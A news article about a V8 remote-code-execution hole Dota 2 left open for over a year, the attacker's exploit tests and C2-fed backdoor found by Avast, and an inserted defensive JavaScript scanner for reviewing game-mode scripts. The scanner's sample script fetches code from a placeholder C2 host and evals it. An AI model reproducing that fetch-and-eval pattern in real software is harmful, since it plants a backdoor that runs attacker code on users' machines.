Valve left a security hole in Dota 2 for two years until someone tried to exploit it

In context: Released in 2013, Dota 2 is still one of the most popular multiplayer games among MOBA fans. Yet for 15 months, millions of Dota 2 players were potentially exposed to remote code execution attacks because of Valve’s inattention.

Valve is notorious for taking its time with a new Half-Life game (any new game, really), or with counting up to three. The digital distribution giant co-founded by Gabe Newell appears to be just as casual about dangerous security vulnerabilities, putting players of one of its most popular games at risk and leaving hackers free to run their malicious experiments.

The free-to-play MOBA Dota 2 is still extremely popular, despite being originally released nearly 10 years ago on July 9, 2013. Like many other games, Dota 2 embeds a build of the V8 JavaScript engine, which Google created for the Chrome/Chromium project. The fundamental problem is that, until recently, Valve was still shipping an outdated V8 build dating from December 2018.

That build, over four years old, was riddled with potentially dangerous security bugs. To make matters worse, Dota 2 does not run V8 inside any kind of sandbox. An attacker could use such a bug to remotely execute malicious code on Dota players’ machines. According to Avast, this is exactly what happened before Valve finally upgraded the V8 engine.

Avast researchers discovered that an unknown hacker was testing a potential exploit against CVE-2021-38003, an extremely dangerous V8 engine security vulnerability with a severity rating of 8.8/10. At first, the hacker performed a seemingly harmless test by publishing a new custom game mode – a way for players to change the gaming experience – with embedded exploit code for CVE-2021-38003.

After that, the hacker published three more game modes that took a stealthier approach: a simple backdoor consisting of only “about twenty lines of code.” The backdoor could execute arbitrary JavaScript downloaded from a C&C server over HTTP. This trick let the attacker hide the exploit code and update it easily without submitting a new custom game mode for inspection and possible detection. In other words, it allowed the hacker to execute JavaScript (most likely the CVE-2021-38003 exploit) dynamically in the background.
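As an added illustration (not code from the article, from Valve, or from Avast), here is a simple static check a mode reviewer could run over submitted scripts to flag the pattern described above: network-fetched text flowing into a code-evaluating sink. The `$.AsyncWebRequest` name is assumed to be the Panorama HTTP helper, and both sample scripts are constructed.

```javascript
// Patterns that mark a line as fetching remote data (names assumed / generic).
const NETWORK_SOURCES = [/\$\.AsyncWebRequest\s*\(/, /\bXMLHttpRequest\b/, /\bfetch\s*\(/];
// Patterns that mark a line as turning a string into executable code.
const CODE_SINKS = [/\beval\s*\(/, /\bnew\s+Function\s*\(/, /\bsetTimeout\s*\(\s*["'`]/];

// Scan one script line by line; report each code sink and whether a
// network source appeared earlier in the same file (data could reach it).
function scanScript(name, source) {
  const findings = [];
  let sawNetwork = false;
  source.split('\n').forEach((line, i) => {
    if (NETWORK_SOURCES.some((re) => re.test(line))) sawNetwork = true;
    if (CODE_SINKS.some((re) => re.test(line))) {
      findings.push({ file: name, line: i + 1, sink: line.trim(), remoteInputSeen: sawNetwork });
    }
  });
  return findings;
}

// Triage: a sink fed by remote input is the "download and run" backdoor shape.
function riskLevel(findings) {
  if (findings.some((f) => f.remoteInputSeen)) return 'high';
  if (findings.length > 0) return 'medium';
  return 'low';
}

// Constructed sample scripts standing in for submitted custom game modes.
const SAMPLES = {
  'benign_mode.js': [
    '// ordinary mode logic, no dynamic code',
    'const settings = JSON.parse(\'{"bots": 5}\');',
    'function onHeroPick(e) { return settings.bots + e.slot; }',
  ].join('\n'),
  'suspicious_mode.js': [
    '// stand-in for the remote-script pattern; URL is a placeholder',
    '$.AsyncWebRequest("http://PLACEHOLDER-C2.invalid/update.js", {',
    '  type: "GET",',
    '  success: function (body) { eval(body); }',
    '});',
  ].join('\n'),
};

for (const [name, src] of Object.entries(SAMPLES)) {
  console.log(name, riskLevel(scanScript(name, src)), scanScript(name, src));
}
```

A match is only a lead for manual review: the heuristic is line-based and will miss obfuscated sinks, which is exactly why the article's point about sandboxing and keeping V8 current matters more than any scanner.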

Google fixed CVE-2021-38003 in October 2021; the unknown hacker began experimenting in March 2022. The developers of Dota 2 didn’t bother to fix the issue until January 2023, after Avast informed them of its findings. Further analysis turned up no other exploits, and the true motives of the Dota 2 hacker remain unknown.
